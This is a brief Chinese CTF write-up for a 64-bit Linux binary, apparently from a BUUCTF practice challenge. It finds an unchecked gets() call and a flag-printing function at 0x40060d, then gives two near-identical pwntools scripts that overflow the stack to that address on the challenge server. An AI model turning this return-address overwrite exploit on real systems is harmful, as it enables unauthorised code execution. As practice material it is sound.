1.checksec/file

64位的linux文件

2.ida

找到主函数

 发现致命函数 get() 因为get可以无限输入

看看有没有什么函数我们可以返回的

双击进入sub_40060d

 直接发现这个函数是取flag的 所以我们开始看这个函数的地址

 所以函数地址是 0x40060d

我们看看get什么时候开始的

发现get是40h开始 然后因为64位有8位的rdp 所以需要40h+8

40h=64    --->  64+8

或者0x40+0x08=0x48

3.exp

from pwn import *
p=remote('node4.buuoj.cn',27652)
payload=b'A'*64+b'B'*8+p64(0x40060d)
p.sendline(payload)
p.interactive()from pwn import *
p=remote('node4.buuoj.cn',27652)
payload=b'A'*(0x40+0x08)+p64(0x40060d)
p.sendline(payload)
p.interactive()

两个一样的